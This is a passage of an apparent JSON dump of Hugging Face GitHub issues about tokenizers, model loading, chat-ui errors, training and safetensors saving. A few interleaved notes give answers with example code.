tokenizer.encode(text)\r\nprint(encoded_text.tokens)\r\n# My work around to preverse byte_fallback tokens\r\n# and remove other special tokens\r\ndecoded_text = tokenizer.decode(encoded_text.ids, 
skip_special_tokens=False)\r\nprint(decoded_text.removeprefix(' ').removesuffix(''))\r\n```\r\n\r\n## Problem\r\n\r\nNo matter how I tried this line `tokenizer.add_tokens([AddedToken(content=f\"<0x{i:02X}>\", special=True, normalized=False) for i in range(256)])` with different position in my code (before training, after training) and with different parameters of AddedToken, I still can not achieve Llama's behavior. ", "url": "https://github.com/huggingface/tokenizers/issues/1407", "state": "open", "labels": [ "bytefallback", "Feature Request" ], "created_at": "2023-12-06T09:03:35Z", "updated_at": "2024-08-27T01:57:04Z", "user": "dinhanhx" }, { "repo": "huggingface/transformers.js", "number": 432, "title": "Cannot download the model from huggingface", "body": "Because of the network reason, when using transfomer.js we cannot download the model successful\r\nHow to set the network proxy for the model download\r\n", "url": "https://github.com/huggingface/transformers.js/issues/432", "state": "open", "labels": [ "question" ], "created_at": "2023-12-06T08:18:58Z", "updated_at": "2023-12-10T13:42:50Z", "user": "wujohns" }, { "repo": "huggingface/blog", "number": 1677, "title": "how to achieve image-text matching of BLIP2", "body": "Hi, Thanks to the authors for the works.\r\nI am trying to achieve image-text matching of BLIP2, but I didn't find any examples of that. Can you give me some help or tips?", "url": "https://github.com/huggingface/blog/issues/1677", "state": "open", "labels": [], "created_at": "2023-12-06T07:03:21Z", "updated_at": "2023-12-06T07:08:48Z", "user": "wkqun555" }, { "repo": "huggingface/diffusers", "number": 6070, "title": "How to overload existing class in diffusers", "body": "That's just for personal development. I want to write a new class inherited from existing class (e.g. `ControlNetModel`) and I added some new parameters to `__init__` function, but found that the `__init__` function is still the parent's implementation, whether to add the decorator `register_to_config` or not.\r\n\r\nHope some advice.\r\n", "url": "https://github.com/huggingface/diffusers/issues/6070", "state": "closed", "labels": [], "created_at": "2023-12-06T06:41:44Z", "updated_at": "2024-09-25T14:44:04Z", "user": "OrangeSodahub" }, { "repo": "huggingface/diffusers", "number": 6067, "title": "How to run the fine_tuned model?", "body": "Hi all,\r\n\r\nI used the instructions given [here](https://github.com/huggingface/diffusers/tree/main/examples/dreambooth) to fine_tune the model on dog pictures (as explained in the link).\r\nThe fine_tuning has finished, and a folder called path-to-save-model has been created (that has the weights of the model). Now how do I use this output? Do I run test_dreambooth.py? 
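> Note on huggingface/datasets#6478 further up (loading data from lakeFS): lakeFS exposes an S3-compatible gateway, so one untested option is to point `load_dataset` at it through the fsspec/s3fs `storage_options` argument. Endpoint URL, repo/branch layout, credentials, and the parquet format below are all placeholders for the company-specific setup:

```python
from datasets import load_dataset

# lakeFS S3 gateway convention: bucket = repository name, first path segment = branch.
storage_options = {
    "key": "<lakefs-access-key-id>",
    "secret": "<lakefs-secret-access-key>",
    "client_kwargs": {"endpoint_url": "https://lakefs.example.com"},
}

ds = load_dataset(
    "parquet",  # or "csv"/"json", matching how the data is stored
    data_files="s3://my-repo/main/data/*.parquet",
    storage_options=storage_options,
)
```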
(I tried running it but it gives error at \"from test_examples_utils import ExamplesTestsAccelerate, run_command # noqa: E402\"\r\n\r\nI appreciate it if someone can please let me know how to use the output of the trained model.\r\n\r\nThank you", "url": "https://github.com/huggingface/diffusers/issues/6067", "state": "closed", "labels": [], "created_at": "2023-12-06T01:01:56Z", "updated_at": "2025-04-28T10:32:33Z", "user": "alireza18878" }, { "repo": "huggingface/text-generation-inference", "number": 1314, "title": "What is the default tokenizer behaviour?", "body": "### System Info\n\nN/A\n\n### Information\n\n- [ ] Docker\n- [X] The CLI directly\n\n### Tasks\n\n- [X] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nI'm trying to understand whether special tokens (i.e. BOS and EOS) are added and suppressed on tokenization and decoding.\r\n\r\nEncoding:\r\n- I searched for add_special_tokens in the repo and I don't see anywhere this is being set to true when tokenizing. So, it seems that there are no EOS tokens automatically added.\r\n\r\nDecoding:\r\n- I searched for skip_special_tokens and it seems that [here](https://github.com/huggingface/text-generation-inference/blob/3238c49121b02432bf2938c6ebfd44f06c5adc2f/server/text_generation_server/models/causal_lm.py#L525) on line 541 that indeed BOS and EOS are being supressed.\r\n\r\nIs this understanding correct?\n\n### Expected behavior\n\nIf possible, could the default tokenization strategy be described on the ReadMe so users know what to expect?", "url": "https://github.com/huggingface/text-generation-inference/issues/1314", "state": "closed", "labels": [], "created_at": "2023-12-05T17:35:05Z", "updated_at": "2024-01-19T13:14:13Z", "user": "RonanKMcGovern" }, { "repo": "huggingface/chat-ui", "number": 609, "title": "[Feature Request] Uploading PDFS/Text Files/Images?", "body": "I love the search function and it makes the chat feel so much more accurate! I use it mainly as a direct ChatGPT replacment, using code models when needed or normal models for chat.\r\n\r\nCan we have the option to upload images/pdfs/other files to the chat? the images could be integrated by clip/blip, and the PDF or text files could just be added to the context or summarized and then added?\r\n\r\nIt would be awesome to have! 
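> Note on huggingface/diffusers#6067 above: `test_dreambooth.py` is part of the repository's CI test suite, not the inference entry point. The DreamBooth output directory is itself a diffusers pipeline, so it can be loaded directly; a minimal sketch following the dog example from the DreamBooth README (prompt identifier `sks dog` assumed from that example):

```python
import torch
from diffusers import StableDiffusionPipeline

# "path-to-save-model" is the --output_dir used during training.
pipe = StableDiffusionPipeline.from_pretrained(
    "path-to-save-model", torch_dtype=torch.float16
).to("cuda")

image = pipe("a photo of sks dog in a bucket", num_inference_steps=50).images[0]
image.save("dog-bucket.png")
```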
Thank you for all the work made into this project", "url": "https://github.com/huggingface/chat-ui/issues/609", "state": "open", "labels": [], "created_at": "2023-12-05T12:20:39Z", "updated_at": "2024-10-04T01:13:18Z", "comments": 3, "user": "iChristGit" }, { "repo": "huggingface/trl", "number": 1059, "title": "How can I have the evaluation pass in only the response to a prompted/instructed generation into the metric.", "body": "I have created the following metric:\r\n```py\r\nclass MyCustomMetric(Metric):\r\n def _info(self):\r\n # Returns the MetricInfo that defines the name, description, etc.\r\n return datasets.MetricInfo(\r\n # This should be a short description of your metric.\r\n description=\"_DESCRIPTION\",\r\n # You can cite papers, GitHub repositories, etc.\r\n citation=\"_CITATION\",\r\n # The inputs and outputs your metric expects.\r\n # These are used to validate the inputs and outputs of _compute\r\n inputs_description=\"_KWARGS_DESCRIPTION\",\r\n features=datasets.Features({\r\n 'predictions': datasets.Value('string'),\r\n 'references': datasets.Value('string')\r\n })\r\n )\r\n\r\n def _compute(self, predictions, references):\r\n # Here is where you should put your main metric computation logic\r\n # Adapt your existing code to fit in here\r\n \r\n fc_results = []\r\n for idx, example in enumerate(predictions):\r\n print(f\"Example {idx}: \", end=\"\")\r\n post_message = \"\"\r\n\r\n # Custom Function Calling metric\r\n prompts = None\r\n try:\r\n generated_arguments, expected_arguments, prompts = json_arguments_from_prompt(\r\n references[idx],\r\n predictions[idx],\r\n INSTRUCTION\r\n # {\"idx\": idx, \"epoch\": epoch}\r\n )\r\n fc_result = fc_metric.run(generated_arguments, expected_arguments)\r\n\r\n fc_results.append(fc_result)\r\n\r\n # if save_prompts_path:\r\n # # add prompts to dpo_data.json\r\n # dpo_data.append({\r\n # \"fc_result\": fc_result,\r\n # **prompts\r\n # })\r\n # with open(save_prompts_path, \"w\") as f:\r\n # json.dump(dpo_data, f)\r\n except Exception as e:\r\n print(f\"Error function calling: {e}\\n\")\r\n fc_results.append(0)\r\n return fc_results\r\n```\r\nThis metric expects the prediction to be generated after passing the instruction. For example I have my prompts in the following format:\r\n` [INST] {message} [/INST] {response}`\r\nI want the evaluation to receive the `predictions` for response and then compare those with my `references`. To reiterate, the predictions should be generated from the model being passed ` [INST] {message} [/INST]`.\r\n\r\nCurrently it seems as if the logits are just generated without any prompt resulting in responses like:\r\n```\r\npredicted_strings: ['Unterscheidung Unterscheidung![: What<>_> in returnFUNCTIONS>\\n the is related, return program should be \" the format formatname format format. 
functionFUNCTION_CALL>FORM>( <brUNCTIONSCALL_NAMEGSUMENTS>\\nGUMENTS_ASS_THE_FIED_FORM_FORMAT If, respond \" \" response.\\nFUNCTIONS>username\": \"get\",meanalth\",\",function_ \"description\": \"Get health \"input\": [root\": \"string\", \"properties\": {\" \"}] {\"name\": \"leaf_Results\", \"description\": \"Search search list of searchists\", on a search query\", \"parameters\": {\"type\": \"array\", \"properties\": {\"query\": {\"type\": {\"query\": {\"type\": \"string\" \"required\": \"Search\"}} \"type\": \"array\" \"title\": [\"query\"] \"description\": \"Searchphy Search\"}}}, {\"name\": \"getUserending\",\", \"description\": \"Get a list of trifs that on the tr trending\", \"parameters\": {\"type\": \"object\", \"properties\": {\"}}},}\\nUSERFS>\\n me the ofif from a cat cat doingrootSearchResultsFUNCTION_CALL_ARGUMENTS>{\"json\": {\"query\": \"cool cat\"}}\ufffd\ufffd']\r\n```\r\n\r\nafter looking through the source code it seems like modifying the `prediction_step` method inside `Trainer` is the way to go.", "url": "https://github.com/huggingface/trl/issues/1059", "state": "closed", "labels": [], "created_at": "2023-12-04T19:01:34Z", "updated_at": "2024-01-12T15:05:10Z", "user": "CakeCrusher" }, { "repo": "huggingface/distil-whisper", "number": 49, "title": "How to make training data?", "body": "I have a folder like this: \r\naudio_1\r\ntranscript_1.txt\r\naudio_2\r\ntranscript_2.txt\r\n\r\nhow can I make this folder into huggingface dataset?", "url": "https://github.com/huggingface/distil-whisper/issues/49", "state": "open", "labels": [], "created_at": "2023-12-04T18:44:40Z", "updated_at": "2023-12-12T16:51:48Z", "user": "satani99" }, { "repo": "huggingface/computer-vision-course", "number": 77, "title": "Issue with rendering the course", "body": "If we try to render the course to preview how our added content looks like, it throws the following error\r\n```bash\r\nsarthak@kde:~/Desktop/computer-vision-course$ doc-builder preview computer-vision-course chapters/ --not_python_module\r\nInitial build docs for computer-vision-course chapters/ /tmp/tmp0uqdjoxf/computer-vision-course/main/en\r\nBuilding the MDX files: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 29/29 [00:00<00:00, 1288.27it/s]\r\nTraceback (most recent call last):\r\n File \"/home/sarthak/anaconda3/bin/doc-builder\", line 8, in \r\n sys.exit(main())\r\n File \"/home/sarthak/anaconda3/lib/python3.9/site-packages/doc_builder/commands/doc_builder_cli.py\", line 47, in main\r\n args.func(args)\r\n File \"/home/sarthak/anaconda3/lib/python3.9/site-packages/doc_builder/commands/preview.py\", line 171, in preview_command\r\n source_files_mapping = build_doc(\r\n File \"/home/sarthak/anaconda3/lib/python3.9/site-packages/doc_builder/build_doc.py\", line 405, in build_doc\r\n sphinx_refs = check_toc_integrity(doc_folder, output_dir)\r\n 
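> Note on huggingface/distil-whisper#49 above: a hedged sketch that turns such a folder into a Hugging Face dataset with the `datasets` library; file names and the `.wav` extension are assumptions about the folder layout:

```python
from datasets import Dataset, Audio

audio_files = ["audio_1.wav", "audio_2.wav"]
texts = []
for path in ["transcript_1.txt", "transcript_2.txt"]:
    with open(path) as f:
        texts.append(f.read().strip())

ds = Dataset.from_dict({"audio": audio_files, "text": texts})
# Decode audio lazily at 16 kHz, the rate Whisper-style models expect.
ds = ds.cast_column("audio", Audio(sampling_rate=16_000))

ds.save_to_disk("my_asr_dataset")        # local copy
# ds.push_to_hub("your-username/my_asr_dataset")  # or publish to the Hub
```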
File \"/home/sarthak/anaconda3/lib/python3.9/site-packages/doc_builder/build_doc.py\", line 460, in check_toc_integrity\r\n raise RuntimeError(\r\nRuntimeError: The following files are not present in the table of contents:\r\n- en/Unit 5 - Generative Models/variational_autoencoders\r\n- en/Unit 5 - Generative Models/README\r\n- en/Unit 11 - Zero Shot Computer Vision/README\r\n- en/Unit 2 - Convolutional Neural Networks/README\r\n- en/Unit 1 - Fundamentals/README\r\n- en/Unit 8 - 3D Vision, Scene Rendering and Reconstruction/README\r\n- en/Unit 4 - Mulitmodal Models/README\r\n- en/Unit 9 - Model Optimization/README\r\n- en/Unit 6 - Basic CV Tasks/README\r\n- en/Unit 7 - Video and Video Processing/README\r\n- en/Unit 13 - Outlook/README\r\n- en/Unit 3 - Vision Transformers/README\r\n- en/Unit 12 - Ethics and Biases/README\r\n- en/Unit 10 - Synthetic Data Creation/README\r\nAdd them to chapters/_toctree.yml.\r\n```\r\n\r\n**Explanation:** This is because there have been README files added to each chapter. However, these README files are not present in the `_toctree.yml`.\r\n\r\n**Why it's important:** Being able to render the course locally is important as it can give us a rough overview of how the content looks like.\r\n\r\n**Possible solutions could be:**\r\n* Remove the README files for the time being\r\n* Add them to the toctree and also making sure that if anyone adds any chapter contents they also update the toctree making it easier for others to render the course\r\n\r\nOpen for discussion from other members :v: \r\n\r\n", "url": "https://github.com/huggingface/computer-vision-course/issues/77", "state": "open", "labels": [ "question" ], "created_at": "2023-12-04T01:02:22Z", "updated_at": "2023-12-08T18:17:19Z", "user": "sarthak247" }, { "repo": "huggingface/sentence-transformers", "number": 2363, "title": "How to retrieve the epoch of the saved model from model.save ?", "body": "Hi, \r\nThank you for the repo. \r\n\r\nCan anyone help me with retrieving the epoch of the saved model, in both cases where save_best_model=True and save_best_model=False? \r\nThank you\r\n\r\n``` \r\nmodel.fit(train_objectives=[(train_dataloader, train_loss)],\r\n evaluator=evaluator,\r\n epochs=num_epochs,\r\n evaluation_steps=1000,\r\n warmup_steps=warmup_steps,\r\n save_best_model=True,\r\n output_path=output_path)\r\n\r\nmodel.save(path)```", "url": "https://github.com/huggingface/sentence-transformers/issues/2363", "state": "closed", "labels": [], "created_at": "2023-12-02T15:25:52Z", "updated_at": "2024-01-09T22:16:20Z", "user": "gowrijsuria" }, { "repo": "huggingface/transformers.js", "number": 426, "title": "[Question] feature-extraction discrepancies across different platforms", "body": "I'm observing discrepancies in feature-extraction results across different platforms. Here's the code:\r\n\r\n```js\r\nimport { pipeline, env } from '@xenova/transformers'\r\n\r\nconst extractor = await pipeline('feature-extraction', 'Xenova/gte-small', {\r\n quantized: false,\r\n cache_dir: './.cache',\r\n local_files_only: false,\r\n})\r\n\r\nconst text = 'hello'\r\nconst embedding = await extractor(text, { pooling: 'mean', normalize: true })\r\nconst response = Array.from(embedding.data)\r\nconsole.log(JSON.stringify(response, null, 2))\r\n\r\n// Node v20\r\n// \"@xenova/transformers\": \"^2.9.0\"\r\n```\r\n\r\nThe results differ between macOS 13 (Apple Silicon/Arm) and Ubuntu 23.1 (Raspberry Pi/Arm). 
I've tried various configurations (e.g., pooling, normalize, with and without Array.from) and still observe different results. It's worth noting that sequential calls on the same platform produce consistent results.\r\n\r\nI have a few questions:\r\n\r\n1. Is this discrepancy expected due to the nature of float32 precision and rounding, even though the calculations are performed on ARM architecture?\r\n2. Given that the difference is extremely small, could it still impact accuracy in any significant way?\r\n\r\n[mean-nonorm-mac-01.json](https://github.com/xenova/transformers.js/files/13530082/mean-nonorm-mac-01.json)\r\n[mean-nonorm-pi-01.json](https://github.com/xenova/transformers.js/files/13530083/mean-nonorm-pi-01.json)\r\n[mean-norm-mac-01.json](https://github.com/xenova/transformers.js/files/13530084/mean-norm-mac-01.json)\r\n[mean-norm-pi-01.json](https://github.com/xenova/transformers.js/files/13530086/mean-norm-pi-01.json)\r\n", "url": "https://github.com/huggingface/transformers.js/issues/426", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-01T17:12:04Z", "updated_at": "2023-12-05T18:51:03Z", "user": "devfacet" }, { "repo": "huggingface/chat-ui", "number": 604, "title": "\"Invalid State: Controller is already closed\" error when trying to use chat-ui locally with llama.cpp", "body": "HELP NEEDED\r\n\r\n**What is the issue?**\r\nNot able to use chat-ui locally to get the response back when using the llama.cpp as a server.\r\nI can load the chat-ui after installing it via npm install and npm run dev. The env.local file is also configured and UI allows to send the request. However, the response never comes back in UI, and 'Sorry, something went wrong. Please try again' is shown.\r\nOn checking the logs in chat-ui, the error shown is:\r\n\r\nTypeError [ERR_INVALID_STATE]: Invalid state: Controller is already closed\r\n at new NodeError (node:internal/errors:399:5)\r\n at ReadableStreamDefaultController.enqueue (node:internal/webstreams/readablestream:1036:13)\r\n at update (/home/devuser/development/chat-ui-main/src/routes/conversation/[id]/+server.ts:158:20)\r\n at eval (/home/devuser/development/chat-ui-main/src/routes/conversation/[id]/+server.ts:168:13)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async Object.start (/home/devuser/development/chat-ui-main/src/routes/conversation/[id]/+server.ts:260:7) {\r\n code: 'ERR_INVALID_STATE'\r\n \r\n I also tested the llama.cpp server response via curl and the response came back correctly, so it's not an issue with llama.cpp.\r\n\r\nVersions:\r\nchat-ui code is latest from master.\r\nllama.cpp code is latest from master and build locally.\r\nTried with Node 20 and then with Node 19, but issue still remains.\r\n\r\nenv.local:\r\nMONGODB_URL=mongodb://localhost:27017\r\nMONGODB_DB_NAME=chat-ui\r\nMONGODB_DIRECT_CONNECTION=false\r\nUSE_LOCAL_WEBSEARCH=true\r\nHF_ACCESS_TOKEN=test\r\nMODELS=`[\r\n {\r\n \"name\": \"Zephyr\",\r\n \"chatPromptTemplate\": \"<|system|>\\n{{preprompt}}\\n{{#each messages}}{{#ifUser}}<|user|>\\n{{content}}\\n<|assistant|>\\n{{/ifUser}}{{#ifAssistant}}{{content}}\\n{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.7,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.1,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 2048,\r\n \"stop\": [\"\"]\r\n },\r\n \"endpoints\": [\r\n {\r\n \"url\": \"http://localhost:8080\",\r\n \"type\": \"llamacpp\"\r\n }\r\n ]\r\n }\r\n]`\r\n\r\nAm I missing anything in terms of 
installation steps? Any help here will be appreciated.\r\n\r\n\r\n\r\n\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/604", "state": "closed", "labels": [], "created_at": "2023-11-30T16:42:06Z", "updated_at": "2023-11-30T17:41:19Z", "comments": 1, "user": "ManasInd" }, { "repo": "huggingface/optimum", "number": 1556, "title": "RuntimeError: Cannot infer the task from a local directory yet, please specify the task manually.", "body": "### System Info\r\n\r\nwindows 10 - ryzen 3600x - 16 gb ddr4-3000 - python 3.10 - latest optimum inside a venv\r\n\r\n### Who can help?\r\n\r\n_No response_\r\n\r\n### Information\r\n\r\nWhen I try to convert a model to openvino using \r\n\r\noptimum-cli export openvino -m \"d:\\sdxl\\LCMphoton\" \"d:\\sdxl\\LCMphotonov\"\r\n\r\nI have this error : \r\nRuntimeError: Cannot infer the task from a local directory yet, please specify the task manually.\r\n\r\nI am converting standard sd1.5 models to lcm with lora locally and want to convert that to openvino. I have local models which are not present on huggingface and it takes forever for me to upload there (only 1-2 megabytes max) Can we somehow use local models that have the same directory structure as hf ?\r\n```\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\noptimum-cli export openvino -m \"d:\\sdxl\\LCMphoton\" \"d:\\sdxl\\LCMphotonov\"\r\n\r\n### Expected behavior\r\n\r\nI want to be able to convert local models without having to download from huggingface.", "url": "https://github.com/huggingface/optimum/issues/1556", "state": "closed", "labels": [ "bug" ], "created_at": "2023-11-30T16:09:24Z", "updated_at": "2023-12-09T22:37:44Z", "comments": 2, "user": "patientx" }, { "repo": "huggingface/safetensors", "number": 396, "title": "[Feature request] How about support async save to disk?", "body": "### Feature request\n\nHow about support async save to disk? \r\n\r\n\n\n### Motivation\n\nthe weight or optimizer is vary large for LLMs\uff0cso\uff0cit will waste a lot of time for tensor from cpu to disk\u3002\r\nIf we can support async save to disk, it will be vary helpful.\n\n### Your contribution\n\n.", "url": "https://github.com/huggingface/safetensors/issues/396", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-11-30T02:55:25Z", "updated_at": "2024-02-13T01:46:40Z", "user": "ZHUI" }, { "repo": "huggingface/transformers.js", "number": 424, "title": "[Question] Batch inference for vit", "body": "It seems like all the tests in the repository related to processors and image models use one image per input. \r\n1. Do the models support feeding a batch of images as input during inference? Is there a speed benefit from this? \r\n2. 
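> Note on huggingface/safetensors#396 above: the library saves synchronously, but a user-side workaround is to copy tensors to CPU on the main thread and hand the disk write to a background thread. A minimal sketch, not an official API (for state dicts with tied weights, `safetensors.torch.save_model` may be needed instead of `save_file`):

```python
import threading
from safetensors.torch import save_file

def async_save(tensors, path):
    # Snapshot to CPU first so training can keep mutating the GPU tensors.
    cpu_tensors = {k: v.detach().to("cpu", copy=True) for k, v in tensors.items()}
    t = threading.Thread(target=save_file, args=(cpu_tensors, path))
    t.start()
    return t  # caller must join() before exiting or overwriting the file

handle = async_save(model.state_dict(), "checkpoint.safetensors")
# ... continue training while the write happens in the background ...
handle.join()
```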
Are there any other optimization/parallelization tools in transformers.js that I can use to process a set of images?\r\n\r\nUsed model: vit base (google/vit-base-patch16-224-in21k), tiny and small distillations (WinKawaks/vit-tiny-patch16-224), exported in onnx format with optimum\r\n", "url": "https://github.com/huggingface/transformers.js/issues/424", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-29T09:52:16Z", "updated_at": "2023-12-05T14:49:36Z", "user": "arseniymerkulov" }, { "repo": "huggingface/transformers", "number": 27755, "title": "How to inference the model with 200k length context", "body": "### Model description\n\nI want to test Yi-34B-200k, Although I ran through the model, as the context length increased, OOM appeared, and I wondered how I could test to 200k context length with sufficient GPU resources.\n\n### Open source status\n\n- [X] The model implementation is available\n- [X] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/27755", "state": "closed", "labels": [], "created_at": "2023-11-29T07:37:06Z", "updated_at": "2024-05-24T07:24:56Z", "user": "taishan1994" }, { "repo": "huggingface/transformers.js", "number": 423, "title": "Not able to load local classification onnx model", "body": "Was trying to follow the instruction of this page to load local custom model, but failed to find local path https://huggingface.co/docs/transformers.js/custom_usage\r\n\r\nthe code snippet\r\n`\r\nimport { env, AutoTokenizer, AutoModelForSequenceClassification } from '@xenova/transformers';\r\n\r\nenv.useFS = true;\r\nenv.localModelPath = '/path/to/local/file'\r\nenv.allowRemoteModels = false;\r\n\r\nlet tokenizer = await AutoTokenizer.from_pretrained('tinybert');\r\nlet model = await AutoModelForSequenceClassification.from_pretrained('tinybert');\r\n\r\nlet inputs = await tokenizer('I love transformers!');\r\nlet { logits } = await model(inputs);\r\n`\r\nhere is the file structure:\r\nmodels\r\n\u2514\u2500\u2500 tinybert\r\n \u251c\u2500\u2500 config.json\r\n \u251c\u2500\u2500 onnx\r\n \u2502 \u251c\u2500\u2500 model.onnx\r\n \u2502 \u2514\u2500\u2500 model_quantized.onnx\r\n \u251c\u2500\u2500 ort_config.json\r\n \u251c\u2500\u2500 special_tokens_map.json\r\n \u251c\u2500\u2500 tokenizer.json\r\n \u251c\u2500\u2500 tokenizer_config.json\r\n \u2514\u2500\u2500 vocab.txt\r\n\r\nerror:\r\n(node:36959) ExperimentalWarning: stream/web is an experimental feature. 
This feature could change at any time\r\n(Use `node --trace-warnings ...` to show where the warning was created)\r\nUnable to load from local path \"/Users/hzhang14/pete/2023_H1_spam/models/tinybert/tokenizer.json\": \"ReferenceError: Headers is not defined\"\r\nUnable to load from local path \"/Users/hzhang14/pete/2023_H1_spam/models/tinybert/tokenizer_config.json\": \"ReferenceError: Headers is not defined\"\r\nfile:///Users/hzhang14/pete/2023_H1_spam/node_modules/@xenova/transformers/src/utils/hub.js:462\r\n throw Error(`\\`local_files_only=true\\` or \\`env.allowRemoteModels=false\\` and file was not found locally at \"${localPath}\".`);\r\n ^\r\n\r\nError: `local_files_only=true` or `env.allowRemoteModels=false` and file was not found locally at \"/Users/hzhang14/pete/2023_H1_spam/models/tinybert/tokenizer.json\".\r\n at getModelFile (file:///Users/hzhang14/pete/2023_H1_spam/node_modules/@xenova/transformers/src/utils/hub.js:462:27)\r\n at async getModelJSON (file:///Users/hzhang14/pete/2023_H1_spam/node_modules/@xenova/transformers/src/utils/hub.js:575:18)\r\n at async Promise.all (index 0)\r\n at async loadTokenizer (file:///Users/hzhang14/pete/2023_H1_spam/node_modules/@xenova/transformers/src/tokenizers.js:52:16)\r\n at async Function.from_pretrained (file:///Users/hzhang14/pete/2023_H1_spam/node_modules/@xenova/transformers/src/tokenizers.js:3890:48)\r\n at async file:///Users/hzhang14/pete/2023_H1_spam/js/test.mjs:9:17", "url": "https://github.com/huggingface/transformers.js/issues/423", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-29T06:40:09Z", "updated_at": "2023-11-30T07:27:27Z", "user": "purezhanghan" }, { "repo": "huggingface/chat-ui", "number": 594, "title": "TypeError [ERR_INVALID_STATE]: Invalid state: Controller is already closed", "body": "i use the lasted main version and i have error when make chat, and in GUI , it show \"Sorry, something went wrong. 
Please try again.\"\r\n\r\nTypeError [ERR_INVALID_STATE]: Invalid state: Controller is already closed\r\n at new NodeError (node:internal/errors:405:5)\r\n at ReadableStreamDefaultController.enqueue (node:internal/webstreams/readablestream:1040:13)\r\n at update (file:////chat-ui-main/build/server/chunks/_server.ts-38ce6e8d.js:480:22)\r\n at file:////chat-ui-main/build/server/chunks/_server.ts-38ce6e8d.js:492:15\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async Object.start (file:////chat-ui-main/build/server/chunks/_server.ts-38ce6e8d.js:585:9) {\r\n code: 'ERR_INVALID_STATE'\r\n\r\ncan any one help me to fix this problem", "url": "https://github.com/huggingface/chat-ui/issues/594", "state": "closed", "labels": [ "support" ], "created_at": "2023-11-29T04:28:27Z", "updated_at": "2024-06-17T12:48:45Z", "comments": 18, "user": "AlexBlack2202" }, { "repo": "huggingface/chat-ui", "number": 593, "title": "Show image in chat box", "body": "Can I show a image by http link on chat box?", "url": "https://github.com/huggingface/chat-ui/issues/593", "state": "open", "labels": [ "support" ], "created_at": "2023-11-29T03:17:17Z", "updated_at": "2023-11-30T17:57:32Z", "comments": 3, "user": "ntqnhanguyen" }, { "repo": "huggingface/optimum", "number": 1554, "title": "ORT Models Failing because of the latest fsdp changes on transformers Trainer.", "body": "### System Info\n\n```shell\noptimum from source\r\ntransformers from source\n```\n\n\n### Who can help?\n\n@JingyaHuang \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nwhen trying to run training using ortmodule all models will fail due to latest changes on transformers trainer.\r\nfsdp was removed as an attribute and it included other changes.\r\n\r\nI can work on the fix if you guys don't have the bandwith.\r\n\r\n@JingyaHuang \r\nWe also been getting a lot of this types errors, can we work on some CI pipeline to spot these failures so we can fix them fast?\r\n\r\nThanks.\n\n### Expected behavior\n\n\r\n`AttributeError: 'ORTTrainer' object has no attribute 'fsdp'\r\n`\r\n", "url": "https://github.com/huggingface/optimum/issues/1554", "state": "closed", "labels": [ "bug" ], "created_at": "2023-11-28T20:22:40Z", "updated_at": "2023-12-26T18:15:02Z", "comments": 6, "user": "AdamLouly" }, { "repo": "huggingface/chat-ui", "number": 592, "title": "Authentication Doc and Code may be out-of-date/not working", "body": "## Description\r\n\r\nHello,\r\n\r\nFollowing the doc in the `README`: https://github.com/huggingface/chat-ui#basic-and-bearer. The UI should support (if setup in the `.env.local` file) `Basic` and `Bearer` authentication, however, what I noticed since the requests have been moved to the `huggingface` module is that the authorization flow has changed. \r\n\r\nIn the module:\r\n```js\r\n#huggingface/inference/dist/index.mjs\r\n[...]\r\n const { accessToken, model: _model, ...otherArgs } = args;\r\n let { model } = args;\r\n const { forceTask: task, includeCredentials, taskHint, ...otherOptions } = options ?? 
{};\r\n const headers = {};\r\n if (accessToken) {\r\n headers[\"Authorization\"] = `Bearer ${accessToken}`;\r\n }\r\n[...]\r\n```\r\n\r\nIf I define a custom chat endpoint in this way:\r\n```\r\n\"endpoints\": [{\"url\": \"URL/generate_stream\", \"type\" : \"tgi\", \"accessToken\": \"\"}]\r\n```\r\nthen the `accessToken` is properly propagated, but the suggested `\"authorization\": \"Bearer/Basic \"` does not work. \r\n\r\nIf this is intended:\r\n1. I would be happy to open a quick PR to change the README to something like:\r\n```suggestion\r\n#### Bearer\r\n\r\nCustom endpoints may require authorization, depending on how you configure them. Chat-UI support `Bearer` authentication. \r\n\r\nYou can use a token, which can be grabbed from [here](https://huggingface.co/settings/tokens).\r\n\r\nYou can then add the generated information and the `accessToken` parameter to your `.env.local`.\r\n\r\n```env\r\n\"endpoints\": [\r\n{\r\n\"url\": \"https://HOST:PORT\",\r\n\"accessToken\": \"\",\r\n}\r\n]\r\n\r\n**NOTE**: currently, `Basic` authentication is not supported\r\n\r\n```\r\nPlease let me know what do you think, and if I am missing something. \r\n\r\nThanks,\r\nGuido \r\n\r\n\r\n", "url": 